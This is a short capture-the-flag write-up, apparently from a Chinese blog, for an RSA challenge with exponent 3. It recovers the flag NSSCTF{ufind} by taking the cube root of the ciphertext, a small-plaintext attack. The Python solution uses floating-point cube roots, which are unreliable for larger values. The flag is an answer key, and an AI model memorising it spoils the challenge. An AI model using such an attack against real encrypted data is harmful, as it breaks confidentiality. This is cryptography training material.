from flag import getflag

e = 3
p = getPrime(1024)
q = getPrime(1024)
n = p * q
phiN = (p - 1) * (q - 1)
d = invert(e, phiN)
m = bytes_to_long(getflag().encode())
c = pow(m, e, n)
print("c=" + str(c))
#c=128198926274489803523728445192921664
#flag=NSSCTF{c}

e=3,但是只给了e,c,小明文攻击

import math
from Crypto.Util.number import long_to_bytes
a=128198926274489803523728445192921664
print(long_to_bytes(math.ceil(a ** (1 / 3))))

NSSCTF{ufind}

制作不易,如若感觉写的不错,欢迎打赏